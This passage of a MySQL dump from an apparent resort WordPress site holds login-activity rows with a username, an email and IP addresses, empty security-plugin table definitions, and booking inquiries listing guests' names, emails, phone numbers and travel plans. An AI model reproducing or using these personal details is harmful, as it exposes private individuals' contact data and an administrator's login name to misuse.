00:00:00','69.165.31.210','',''),(37,2,'ashbyresort@hotmail.com','2017-02-15 10:51:38','0000-00-00 00:00:00','69.165.31.210','',''),(38,2,'ashbyresort@hotmail.com','2017-02-15 15:16:33','0000-00-00 00:00:00','69.165.31.210','',''),(39,2,'ashbyresort@hotmail.com','2017-02-15 15:16:34','0000-00-00 00:00:00','69.165.31.210','',''),(40,1,'ashmin','2017-02-19 20:42:50','2018-03-31 15:07:59','47.203.137.20','',''),(41,2,'ashbyresort@hotmail.com','2017-03-01 08:55:49','0000-00-00 00:00:00','69.165.31.210','',''),(42,2,'ashbyresort@hotmail.com','2017-03-03 11:48:29','0000-00-00 00:00:00','69.165.31.210','',''),(43,1,'ashmin','2017-03-03 12:03:45','0000-00-00 00:00:00','108.190.212.194','',''),(44,1,'ashmin','2017-03-03 14:52:51','0000-00-00 00:00:00','108.190.212.194','',''),(45,1,'ashmin','2017-03-29 20:53:53','2018-03-31 15:07:59','47.203.137.20','',''),(46,1,'ashmin','2017-04-30 15:34:52','2018-03-31 15:07:59','47.203.137.20','',''),(47,2,'ashbyresort@hotmail.com','2017-05-27 12:20:17','0000-00-00 00:00:00','69.165.31.210','',''),(48,1,'ashmin','2017-05-29 12:49:19','2018-03-31 15:07:59','47.203.137.20','',''),(49,1,'ashmin','2017-06-15 20:45:30','2018-03-31 15:07:59','47.203.137.20','',''),(50,1,'ashmin','2017-07-17 20:43:25','2018-03-31 15:07:59','47.203.137.20','',''),(51,1,'ashmin','2017-11-04 14:23:33','2018-03-31 15:07:59','47.203.137.20','',''),(52,1,'ashmin','2017-11-20 18:27:21','2018-03-31 15:07:59','47.203.137.20','',''),(53,2,'ashbyresort@hotmail.com','2017-12-01 11:43:26','0000-00-00 00:00:00','64.118.2.49','',''),(54,2,'ashbyresort@hotmail.com','2017-12-01 12:24:51','0000-00-00 00:00:00','64.118.2.49','',''),(55,1,'ashmin','2017-12-14 21:06:58','2018-03-31 15:07:59','47.203.137.20','',''),(56,1,'ashmin','2018-01-11 19:22:50','2018-03-31 15:07:59','47.203.137.20','',''),(57,1,'ashmin','2018-01-16 18:46:22','2018-03-31 15:07:59','47.203.137.20','',''),(58,2,'ashbyresort@hotmail.com','2018-01-26 10:52:55','0000-00-00 00:00:00','64.118.2.49','',''),(59,1,'ashmin','2018-02-10 18:46:46','2018-03-31 15:07:59','47.203.137.20','',''),(60,1,'ashmin','2018-02-15 20:29:38','2018-03-31 15:07:59','47.203.137.20','',''),(61,1,'ashmin','2018-03-05 19:36:10','2018-03-31 15:07:59','47.203.137.20','',''),(62,1,'ashmin','2018-03-06 07:54:03','0000-00-00 00:00:00','108.190.212.194','',''),(63,1,'ashmin','2018-03-06 18:58:46','2018-03-31 15:07:59','47.203.137.20','',''),(64,1,'ashmin','2018-03-06 19:32:19','2018-03-31 15:07:59','47.203.137.20','',''),(65,1,'ashmin','2018-03-06 20:12:39','2018-03-31 15:07:59','47.203.137.20','',''),(66,1,'ashmin','2018-03-09 19:05:46','2018-03-31 15:07:59','47.203.137.20','',''),(67,1,'ashmin','2018-03-31 12:15:58','2018-03-31 15:07:59','47.203.137.20','',''),(68,1,'ashmin','2018-03-31 12:21:45','2018-03-31 15:07:59','47.203.137.20','',''),(69,1,'ashmin','2018-03-31 14:50:09','2018-03-31 15:07:59','47.203.137.20','',''),(70,1,'ashmin','2018-03-31 15:20:56','2018-03-31 15:24:52','47.203.137.20','',''),(71,1,'ashmin','2018-03-31 15:29:26','2018-03-31 20:42:47','47.203.137.20','',''),(72,1,'ashmin','2018-03-31 21:20:46','2019-06-16 10:49:11','47.203.137.20','',''),(73,1,'ashmin','2018-03-31 21:24:23','2019-06-16 10:49:11','47.203.137.20','',''),(74,1,'ashmin','2018-03-31 21:59:58','2019-06-16 10:49:11','47.203.137.20','',''),(75,1,'ashmin','2018-03-31 23:04:23','2019-06-16 10:49:11','47.203.137.20','',''),(76,1,'ashmin','2018-04-01 21:33:00','2019-06-16 10:49:11','47.203.137.20','',''),(77,1,'ashmin','2018-04-02 08:35:41','0000-00-00 00:00:00','108.190.212.194','',''),(78,1,'ashmin','2018-04-02 12:15:21','0000-00-00 00:00:00','108.190.212.194','',''),(79,1,'ashmin','2018-04-16 19:50:40','2019-06-16 10:49:11','47.203.137.20','',''),(80,1,'ashmin','2018-04-16 20:24:52','2019-06-16 10:49:11','47.203.137.20','',''),(81,1,'ashmin','2018-04-24 18:40:40','2019-06-16 10:49:11','47.203.137.20','',''),(82,1,'ashmin','2018-08-13 16:09:38','0000-00-00 00:00:00','108.191.165.77','',''),(83,1,'ashmin','2018-11-08 21:20:17','2019-06-16 10:49:11','47.203.137.20','',''),(84,1,'ashmin','2018-11-15 18:17:56','2019-06-16 10:49:11','47.203.137.20','',''),(85,1,'ashmin','2018-11-26 19:50:07','2019-06-16 10:49:11','47.203.137.20','',''),(86,1,'ashmin','2018-12-06 20:29:12','2019-06-16 10:49:11','47.203.137.20','',''),(87,1,'ashmin','2018-12-10 19:20:08','2019-06-16 10:49:11','47.203.137.20','',''),(88,2,'ashbyresort@hotmail.com','2018-12-12 14:06:31','0000-00-00 00:00:00','64.118.2.70','',''),(89,2,'ashbyresort@hotmail.com','2018-12-12 14:48:34','0000-00-00 00:00:00','64.118.2.70','',''),(90,1,'ashmin','2018-12-14 11:15:35','2019-06-16 10:49:11','47.203.137.20','',''),(91,2,'ashbyresort@hotmail.com','2018-12-17 12:04:29','0000-00-00 00:00:00','64.118.2.70','',''),(92,1,'ashmin','2019-01-01 18:52:20','2019-06-16 10:49:11','47.203.137.20','',''),(93,1,'ashmin','2019-01-14 18:25:13','2019-06-16 10:49:11','47.203.137.20','',''),(94,1,'ashmin','2019-03-31 15:38:34','2019-06-16 10:49:11','47.203.137.20','',''),(95,1,'ashmin','2019-04-02 10:22:04','0000-00-00 00:00:00','108.191.165.77','',''),(96,2,'ashbyresort@hotmail.com','2019-04-02 10:31:59','0000-00-00 00:00:00','108.191.165.77','',''),(97,2,'ashbyresort@hotmail.com','2019-04-02 21:34:25','2019-04-08 22:51:30','69.165.25.149','',''),(98,2,'ashbyresort@hotmail.com','2019-04-03 07:19:47','2019-04-08 22:51:30','69.165.25.149','',''),(99,1,'ashmin','2019-04-07 20:41:30','2019-06-16 10:49:11','47.203.137.20','',''),(100,2,'ashbyresort@hotmail.com','2019-04-08 19:54:33','2019-04-08 22:51:30','69.165.25.149','',''),(101,1,'ashmin','2019-04-08 20:11:50','2019-06-16 10:49:11','47.203.137.20','',''),(102,1,'ashmin','2019-04-08 20:26:15','2019-06-16 10:49:11','47.203.137.20','',''),(103,1,'ashmin','2019-04-08 20:28:19','2019-06-16 10:49:11','47.203.137.20','',''),(104,1,'ashmin','2019-04-08 20:34:45','2019-06-16 10:49:11','47.203.137.20','',''),(105,1,'ashmin','2019-04-08 20:43:50','2019-06-16 10:49:11','47.203.137.20','',''),(106,2,'ashbyresort@hotmail.com','2019-04-08 22:54:27','2019-04-08 22:57:27','69.165.25.149','',''),(107,2,'ashbyresort@hotmail.com','2019-04-09 06:18:16','2019-05-18 08:48:20','69.165.25.149','',''),(108,1,'ashmin','2019-04-09 08:50:16','0000-00-00 00:00:00','108.191.165.77','',''),(109,1,'ashmin','2019-04-09 09:09:19','0000-00-00 00:00:00','108.191.165.77','',''),(110,1,'ashmin','2019-04-09 18:52:15','2019-06-16 10:49:11','47.203.137.20','',''),(111,1,'ashmin','2019-04-09 18:54:06','2019-06-16 10:49:11','47.203.137.20','',''),(112,1,'ashmin','2019-04-10 19:34:18','2019-06-16 10:49:11','47.203.137.20','',''),(113,1,'ashmin','2019-04-10 19:36:13','2019-06-16 10:49:11','47.203.137.20','',''),(114,1,'ashmin','2019-04-11 12:14:57','0000-00-00 00:00:00','108.191.165.77','',''),(115,2,'ashbyresort@hotmail.com','2019-04-15 23:22:54','2019-05-18 08:48:20','69.165.25.149','',''),(116,1,'ashmin','2019-04-18 20:53:44','2019-06-16 10:49:11','47.203.137.20','',''),(117,1,'ashmin','2019-04-28 20:11:10','2019-06-16 10:49:11','47.203.137.20','',''),(118,1,'ashmin','2019-05-08 18:48:36','2019-06-16 10:49:11','47.203.137.20','',''),(119,2,'ashbyresort@hotmail.com','2019-05-18 08:20:59','2019-05-18 08:48:20','69.165.25.149','',''),(120,2,'ashbyresort@hotmail.com','2019-05-19 10:17:50','2019-05-19 10:20:42','69.165.25.149','',''),(121,2,'ashbyresort@hotmail.com','2019-05-19 10:22:12','2019-05-19 10:29:19','69.165.25.149','',''),(122,2,'ashbyresort@hotmail.com','2019-05-22 06:43:58','2019-05-22 06:53:02','69.165.25.149','',''),(123,2,'ashbyresort@hotmail.com','2019-06-02 07:13:43','2019-06-02 07:26:35','69.165.25.149','',''),(124,2,'ashbyresort@hotmail.com','2019-06-04 07:46:40','2019-06-04 08:23:51','69.165.25.149','',''),(125,2,'ashbyresort@hotmail.com','2019-06-10 21:36:06','0000-00-00 00:00:00','69.165.25.149','',''),(126,1,'ashmin','2019-06-13 18:23:01','2019-06-16 10:49:11','47.203.137.20','',''),(127,2,'ashbyresort@hotmail.com','2019-06-25 12:34:40','0000-00-00 00:00:00','97.96.138.155','',''),(128,2,'ashbyresort@hotmail.com','2019-06-25 12:44:08','0000-00-00 00:00:00','69.165.25.149','',''),(129,3,'Dean','2019-07-10 10:56:39','0000-00-00 00:00:00','69.165.25.149','',''),(130,3,'Dean','2019-07-15 17:02:34','0000-00-00 00:00:00','69.165.25.149','',''),(131,3,'Dean','2019-08-03 06:26:13','0000-00-00 00:00:00','69.165.25.149','',''),(132,3,'Dean','2019-08-09 10:09:42','0000-00-00 00:00:00','69.165.25.149','',''),(133,3,'Dean','2019-08-15 15:22:26','0000-00-00 00:00:00','69.165.25.149','',''),(134,3,'Dean','2019-08-21 18:45:06','0000-00-00 00:00:00','69.165.25.149','',''),(135,3,'Dean','2019-08-28 17:16:12','0000-00-00 00:00:00','69.165.25.149','',''),(136,3,'Dean','2019-09-10 09:38:34','0000-00-00 00:00:00','69.165.25.149','',''),(137,1,'ashmin','2019-10-19 11:28:08','0000-00-00 00:00:00','47.203.137.20','',''),(138,1,'ashmin','2019-10-19 12:02:02','0000-00-00 00:00:00','47.203.137.20','',''),(139,1,'ashmin','2019-10-31 13:37:56','0000-00-00 00:00:00','47.203.137.20','',''),(140,1,'ashmin','2019-10-31 13:40:16','0000-00-00 00:00:00','47.203.137.20','',''),(141,3,'Dean','2019-11-12 05:12:30','0000-00-00 00:00:00','69.165.25.149','',''),(142,1,'ashmin','2019-11-27 07:38:07','0000-00-00 00:00:00','47.203.137.20','',''),(143,3,'Dean','2019-12-07 05:33:54','0000-00-00 00:00:00','69.165.31.165','',''),(144,1,'ashmin','2019-12-23 16:14:39','0000-00-00 00:00:00','47.203.137.20','',''),(145,3,'Dean','2019-12-31 10:37:05','0000-00-00 00:00:00','69.165.31.165','',''),(146,1,'ashmin','2020-01-20 13:24:53','0000-00-00 00:00:00','97.96.138.155','',''),(147,1,'ashmin','2020-01-30 18:34:33','0000-00-00 00:00:00','47.203.137.20','',''),(148,3,'Dean','2020-02-03 10:06:18','0000-00-00 00:00:00','69.165.31.165','',''),(149,1,'ashmin','2020-02-21 16:46:56','0000-00-00 00:00:00','97.96.138.155','',''),(150,1,'ashmin','2020-03-01 20:14:08','0000-00-00 00:00:00','47.203.137.20','',''),(151,1,'ashmin','2020-03-18 20:17:22','0000-00-00 00:00:00','47.203.137.20','',''),(152,1,'ashmin','2020-04-01 18:12:54','0000-00-00 00:00:00','47.203.137.20','',''),(153,3,'Dean','2020-04-24 16:16:41','0000-00-00 00:00:00','69.165.31.165','',''),(154,3,'Dean','2020-04-24 16:19:17','0000-00-00 00:00:00','69.165.31.165','',''),(155,1,'ashmin','2020-04-25 09:06:27','0000-00-00 00:00:00','47.203.137.20','',''),(156,3,'Dean','2020-05-03 10:21:21','0000-00-00 00:00:00','69.165.31.165','',''),(157,1,'ashmin','2020-05-10 14:34:26','0000-00-00 00:00:00','47.203.137.20','',''),(158,3,'Dean','2020-05-12 19:39:31','0000-00-00 00:00:00','69.165.31.165','',''),(159,1,'ashmin','2020-06-01 19:01:06','0000-00-00 00:00:00','47.203.137.20','',''),(160,3,'Dean','2020-06-15 08:48:53','0000-00-00 00:00:00','69.165.31.165','',''),(161,1,'ashmin','2020-06-20 11:03:53','0000-00-00 00:00:00','47.203.137.20','',''),(162,1,'ashmin','2020-07-01 20:02:22','0000-00-00 00:00:00','47.203.137.20','',''),(163,3,'Dean','2020-07-02 05:49:41','0000-00-00 00:00:00','69.165.31.165','',''),(164,3,'Dean','2020-07-09 12:48:46','0000-00-00 00:00:00','69.165.31.165','',''),(165,3,'Dean','2020-07-24 20:55:34','0000-00-00 00:00:00','69.165.31.165','',''),(166,3,'Dean','2020-07-29 13:33:05','0000-00-00 00:00:00','69.165.31.165','',''),(167,1,'ashmin','2020-08-05 20:20:10','0000-00-00 00:00:00','47.203.137.20','',''),(168,3,'Dean','2020-08-23 06:30:26','0000-00-00 00:00:00','69.165.31.165','',''),(169,3,'Dean','2020-08-25 07:17:45','0000-00-00 00:00:00','69.165.31.165','',''),(170,3,'Dean','2020-08-25 07:47:21','0000-00-00 00:00:00','69.165.31.165','',''),(171,1,'ashmin','2020-08-30 15:33:44','0000-00-00 00:00:00','47.203.137.20','',''),(172,1,'ashmin','2020-09-02 20:23:07','0000-00-00 00:00:00','47.203.137.20','',''),(173,1,'ashmin','2020-10-10 08:55:13','0000-00-00 00:00:00','47.203.137.20','',''),(174,1,'ashmin','2020-10-30 13:17:20','0000-00-00 00:00:00','47.203.137.20','','');
/*!40000 ALTER TABLE `ar_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `ar_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `release_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `failed_login_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `lock_reason` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `unlock_key` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_aiowps_login_lockdown`
--

LOCK TABLES `ar_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `ar_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `ar_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `block_reason` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `country_origin` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_aiowps_permanent_block`
--

LOCK TABLES `ar_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `ar_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_booking`
--

DROP TABLE IF EXISTS `ar_booking`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_booking` (
  `booking_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `trash` bigint(10) NOT NULL DEFAULT 0,
  `sync_gid` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `is_new` bigint(10) NOT NULL DEFAULT 1,
  `status` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sort_date` datetime DEFAULT NULL,
  `modification_date` datetime DEFAULT NULL,
  `form` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `booking_type` bigint(10) NOT NULL DEFAULT 1,
  PRIMARY KEY (`booking_id`)
) ENGINE=MyISAM AUTO_INCREMENT=177 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_booking`
--

LOCK TABLES `ar_booking` WRITE;
/*!40000 ALTER TABLE `ar_booking` DISABLE KEYS */;
INSERT INTO `ar_booking` VALUES (1,1,'',1,'','2016-03-14 00:00:00','2016-03-12 19:48:27','text^name1^Jony~text^secondname1^Smith~text^email1^example-free@wpbookingcalendar.com~text^phone1^8(038)458-77-77~textarea^details1^Reserve a room with sea view',1),(2,1,'',1,'','2016-06-06 00:00:00','2016-04-02 18:53:41','text^name1^David~text^secondname1^Conway~email^email1^dbc@dconway.com~text^phone1^7274908660~textarea^details1^Bringing 4 Want a boat',1),(3,1,'',1,'','2016-08-08 00:00:00','2016-06-21 09:33:53','text^name1^David~text^secondname1^Conway~email^email1^dbc@expcom.com~text^phone1^8005551212~textarea^details1^Family of 4',1),(4,1,'',1,'','2017-08-05 00:00:00','2017-01-19 13:34:09','text^name1^Lisa~text^secondname1^Anderson~email^email1^landerson@rapalausa.com~text^phone1^~textarea^details1^Would like the rates for the motel or cabin for 1 night.  August 5th.',1),(5,1,'',1,'','2017-06-16 00:00:00','2017-01-30 20:44:39','text^name1^Peggy~text^secondname1^Sabbe~email^email1^pjsabbe@gmail.com~text^phone1^701-642-1608~textarea^details1^We are looking for a camping site with 30 amp service, for check in June 16, checkout June 18. We have a 24&#39; camper with one slide out.  ',1),(6,1,'',1,'','2017-05-19 00:00:00','2017-02-02 12:09:36','text^name1^Mike ~text^secondname1^Law~email^email1^michael.law2@usbank.com~text^phone1^6513529129~textarea^details1^I need a sleeper for Friday and Saturday night, May 19-20. I am with the Boxmeyer group.',1),(7,1,'',1,'','2017-02-24 00:00:00','2017-02-02 20:41:06','text^name1^Wendy~text^secondname1^Weickert~email^email1^wendyweickert@hotmail.com~text^phone1^7017995140~textarea^details1^Are you open Feb 24-26?',1),(8,1,'',1,'','2017-02-18 00:00:00','2017-02-02 20:48:20','text^name1^Wendy~text^secondname1^Weickert~email^email1^wendyweickert@hotmail.com~text^phone1^7017995140~textarea^details1^Are you open Feb 24- 26?',1),(9,1,'',1,'','2017-07-22 00:00:00','2017-02-05 19:03:58','text^name1^Andy~text^secondname1^Kraatz~email^email1^andy.kraatz73@gmail.com~text^phone1^4144301558~textarea^details1^We would be interested in cabin #13 or #14 for the week of July 22 - July 29.  What is the rate?',1),(10,1,'',1,'','2017-07-22 00:00:00','2017-02-05 19:04:49','text^name1^Andrew~text^secondname1^Kraatz~email^email1^andy.kraatz73@gmail.com~text^phone1^4144301558~textarea^details1^looking for a cabin for 2 adults 4 teenagers for that week',1),(11,1,'',1,'','2017-07-30 00:00:00','2017-02-11 20:42:04','text^name1^Judy~text^secondname1^Johnson~email^email1^johnson.judy504@gmail.com~text^phone1^701-223-5370~textarea^details1^',1),(12,1,'',1,'','2017-06-02 00:00:00','2017-02-27 10:35:53','text^name1^Lori~text^secondname1^Larson~email^email1^lorilarsonmk@gmail.com~text^phone1^218-790-4563~textarea^details1^Hello, we are looking for a full hook up site for a travel trailer.  What are your check in and check out times?  Thank you!',1),(13,1,'',1,'','2017-07-01 00:00:00','2017-03-05 15:34:42','text^name1^Kacy~text^secondname1^Geiger~email^email1^kacygeiger@aol.com~text^phone1^7013209236~textarea^details1^would these cabins be available ? Cabins 10, 11, 12, 13, 14',1),(14,1,'',1,'','2017-05-26 00:00:00','2017-03-10 14:22:44','text^name1^TRISH~text^secondname1^POLLOCK~email^email1^TPOLLOCK160@GMAIL.COM~text^phone1^~textarea^details1^TRAVEL TRAILER WITH ELECTRIC SITE',1),(15,1,'',1,'','2017-06-09 00:00:00','2017-03-11 20:11:34','text^name1^Jenny ~text^secondname1^Collins~email^email1^jas_2435@hotmail.com~text^phone1^763-355-4413~textarea^details1^We would like to book an RV site for the weekend of June 9th - 11th.  Please let me know what you have available. Thanks!!',1),(16,1,'',1,'','2017-07-12 00:00:00','2017-03-16 12:10:31','text^name1^Kevin~text^secondname1^Gisolf~email^email1^vipphoto@mtcnet.net~text^phone1^605-201-5203~textarea^details1^Looking to see what you have open in July for a cabin #10,11 or 12. Looking for just one cabin.\nDates: \nJuly 12-16 or\nJuly 19-23 or\nAug. 9-13 or\nAug. 16-20.\n\nThank you Kevin ',1),(17,1,'',1,'','2017-06-22 00:00:00','2017-03-16 13:49:24','text^name1^Angie~text^secondname1^Schweitzer~email^email1^schweitzer.angie@gmail.com~text^phone1^7013611351~textarea^details1^Looking to rent a cabin for my parents and we have a 23&#39; camper/trailer and would like electricity. Open to available weekends this summer (June-Aug)',1),(18,1,'',1,'','2017-08-07 00:00:00','2017-03-18 10:08:40','text^name1^Missy~text^secondname1^Thompson~email^email1^Mandmt2012@gmail.com~text^phone1^815-601-3031~textarea^details1^I am looking for the price for 3 nights. Thank you.',1),(19,1,'',1,'','2017-08-08 00:00:00','2017-03-18 10:10:12','text^name1^Missy~text^secondname1^Thompson~email^email1^Mandmt2012@gmail.com~text^phone1^815-601-3031~textarea^details1^Looking to book August 7-10. Can you tell me the price?',1),(20,1,'',1,'','2017-03-31 00:00:00','2017-03-24 14:07:46','text^name1^Andy~text^secondname1^McCullough~email^email1^j.andy.mccullough@gmail.com~text^phone1^6073790505~textarea^details1^I just called and left a message too. Thank you.',1),(21,1,'',1,'','2017-04-02 00:00:00','2017-03-24 14:08:34','text^name1^Andy~text^secondname1^McCullough~email^email1^j.andy.mccullough@gmail.com~text^phone1^6073790505~textarea^details1^',1),(22,1,'',1,'','2017-06-07 00:00:00','2017-04-06 08:44:14','text^name1^Michael~text^secondname1^La Blance~email^email1^andrealablance@gmail.com~text^phone1^519 797 3822~textarea^details1^Could I book a RV site with Electric for June 7, 2017, please.',1),(23,1,'',1,'','2017-05-29 00:00:00','2017-04-09 21:41:58','text^name1^Nate ~text^secondname1^Dicks ~email^email1^nate.dicks@gmail.com~text^phone1^701-388-0300 ~textarea^details1^Checking on any available camping spots for 3 nights starting on 26 May- 29 May. ',1),(24,1,'',1,'','2017-05-12 00:00:00','2017-04-27 15:11:23','text^name1^Chad~text^secondname1^Hirman~email^email1^chadhirmans@gmail.com~text^phone1^612-384-5052~textarea^details1^Do you have any openings for the evening of 5/19-5/21?  I have a single pop-up trailer we would like to spend a weekend at your resort. ',1),(25,1,'',1,'','2017-06-15 00:00:00','2017-05-07 18:37:40','text^name1^Crystal~text^secondname1^Lepinski ~email^email1^Ehuresh13@yahoo.com~text^phone1^~textarea^details1^We are looking for an electric tent camp site for June 15/16 nights. We have two adults and three kids. Thanks! ',1),(26,1,'',1,'','2017-06-19 00:00:00','2017-05-23 16:26:23','text^name1^brian~text^secondname1^frame~email^email1^bcframe@wcta.net~text^phone1^2188375280~textarea^details1^',1),(27,1,'',1,'','2017-06-14 00:00:00','2017-05-27 20:57:09','text^name1^Jinhyung~text^secondname1^Kim~email^email1^jinkimc@gmail.com~text^phone1^7247175929~textarea^details1^',1),(28,1,'',1,'','2017-09-02 00:00:00','2017-05-29 20:35:53','text^name1^Tiffany~text^secondname1^pelley~email^email1^Tiffany.benash@yahoo.com~text^phone1^~textarea^details1^Rtes',1),(29,1,'',1,'','2017-06-01 00:00:00','2017-06-01 07:46:30','text^name1^Amanda~text^secondname1^Kingzett~email^email1^super_k15@hotmail.com~text^phone1^6513011623~textarea^details1^wondering if you have anything available for tonight. 2 people with 2 dogs, just for one night, thanks. If not, do you allow day visitors for a few hours?',1),(30,1,'',1,'','2017-06-17 00:00:00','2017-06-13 07:23:17','text^name1^Brian~text^secondname1^Johnson~email^email1^merrytoonz@hotmail.com~text^phone1^~textarea^details1^Would like to see if you have any sites for this Fri and Sat night.  We have a popup.  Thx  Brian',1),(31,1,'',1,'','2017-07-05 00:00:00','2017-06-18 00:32:55','text^name1^Paul~text^secondname1^Schulenburg~email^email1^pschulenburg@yahoo.com~text^phone1^~textarea^details1^Hi, can you tell me if you have any availability for the night of 7/1 for a cabin that sleeps 2 adults and 3 children?  Thanks, Paul',1),(32,1,'',1,'','2017-06-30 00:00:00','2017-06-20 12:51:18','text^name1^Brianna~text^secondname1^Homola~email^email1^bri_vidmar@yahoo.com~text^phone1^952-374-9450~textarea^details1^Was wondering if June 30th to July 1st was open.',1),(33,1,'',1,'','2017-07-16 00:00:00','2017-06-21 19:32:48','text^name1^Jackie~text^secondname1^Riebhoff~email^email1^jgriebhoff@aol.com~text^phone1^7014124335~textarea^details1^Hi, we are inquiring about a sray at your resort but have no idea what&amp;#39;s available in later july. Could you please respond with dates you have available and your rates for say a week stay or what ever you have available. We are new customers.',1),(34,1,'',1,'','2017-08-12 00:00:00','2017-06-21 19:35:25','text^name1^Jackie~text^secondname1^Riebhoff~email^email1^jgriebhoff@aol.com~text^phone1^7014124335~textarea^details1^I&amp;#39;m not sure if you got our email regarding our inquiry to a stay at your resort',1),(35,1,'',1,'','2017-06-28 00:00:00','2017-06-26 20:32:51','text^name1^marilynn~text^secondname1^beyer~email^email1^mkbeyer_@hotmail.com~text^phone1^218-736-4306~textarea^details1^28th 29th 30th &amp; 1st leaving morning of the 1st.  Want to camp with an RV for these days.',1),(36,1,'',1,'','2017-07-08 00:00:00','2017-07-05 07:32:31','text^name1^Teresa~text^secondname1^Bair~email^email1^Tkbair@gmail.com~text^phone1^4023660403~textarea^details1^Not sure about your calendar, I would like at least electric for a 32&amp;#39; camper, July 7 and 8 if possible . Please contact me.  Thanks!',1),(37,1,'',1,'','2017-07-08 00:00:00','2017-07-05 07:32:39','text^name1^Teresa~text^secondname1^Bair~email^email1^Tkbair@gmail.com~text^phone1^4023660403~textarea^details1^Not sure about your calendar, I would like at least electric for a 32&amp;#39; camper, July 7 and 8 if possible . Please contact me.  Thanks!',1),(38,1,'',1,'','2017-08-25 00:00:00','2017-07-10 22:14:03','text^name1^Alisa~text^secondname1^Smith De Mancera~email^email1^alisamancera@gmail.com~text^phone1^6513289254~textarea^details1^Good afternoon,\nI am looking for a RV site for this weekend the 14th of Jul-16th of July. 30 amp service. Let me know if you are available and also if you have seasonal sites possible for the rest of this season and next season.\nThank you\nemail is the best way to contact me. alisamancera@gmail.com ',1),(39,1,'',1,'','2018-07-21 00:00:00','2017-08-10 15:04:27','text^name1^Krista~text^secondname1^Krupa~email^email1^mandkkrupa@gmail.com~text^phone1^3202952715~textarea^details1^Hello, we are just inquiring about renting 3-4 cabins next July. Could you tell me your availability and rates? Thank you ',1),(40,1,'',1,'','2017-09-21 00:00:00','2017-08-18 21:47:28','text^name1^Patrick~text^secondname1^Ferguson~email^email1^Patferg407@hotmail.com~text^phone1^6517553110~textarea^details1^We are planning on coming up for a retirement meeting in Alexandria on Thurs afternoon the 21st. We have a 33&amp;#39; Tiffan Coach. Plan on leaving Sunday Am...Any 30 am- sites?',1),(41,1,'',1,'','2017-09-21 00:00:00','2017-08-18 21:47:33','text^name1^Patrick~text^secondname1^Ferguson~email^email1^Patferg407@hotmail.com~text^phone1^6517553110~textarea^details1^We are planning on coming up for a retirement meeting in Alexandria on Thurs afternoon the 21st. We have a 33&amp;#39; Tiffan Coach. Plan on leaving Sunday Am...Any 30 am- sites?',1),(42,1,'',1,'','2017-09-01 00:00:00','2017-08-19 16:54:37','text^name1^Scott~text^secondname1^Bartram~email^email1^ads.bartram@gmail.com~text^phone1^4054177069~textarea^details1^32&amp;#39; 5th wheel with 3 slide outs and 30amp electric.  Looking for a place to camp for Labor Day weekend.  Thanks!  -Scott Bartram',1),(43,1,'',1,'','2017-08-26 00:00:00','2017-08-26 12:30:42','text^name1^Michele~text^secondname1^Merxbauer~email^email1^Mrsmerxee@yahoo.com~text^phone1^5074750741~textarea^details1^16 ft camper, electricity preferred',1),(44,1,'',1,'','2017-09-08 00:00:00','2017-09-05 13:35:28','text^name1^Sheri~text^secondname1^Weig~email^email1^sheri_steidl@hotmail.com~text^phone1^7012122333~textarea^details1^My husband and i are looking for a spot to stay this weekend (9/8-9/10). We have an expandable travel trailer - 30&amp;#39; fully expanded. Looking for water/sewer/electrical hookups. We also have 1 dog. ',1),(45,1,'',1,'','2017-11-03 00:00:00','2017-10-10 13:30:28','text^name1^Bill~text^secondname1^Kraemer~email^email1^bill.kraemer@oibmn.com~text^phone1^612-366-1073~textarea^details1^Looking to book a cabin for Friday and Saturday night Nov. 3rd and 4th.The cabin with two queens and one double bed would be best. Let me know what you have available that about this size and is available that first weekend in Nov. Thanks,\nBill',1),(46,1,'',1,'','2017-10-18 00:00:00','2017-10-12 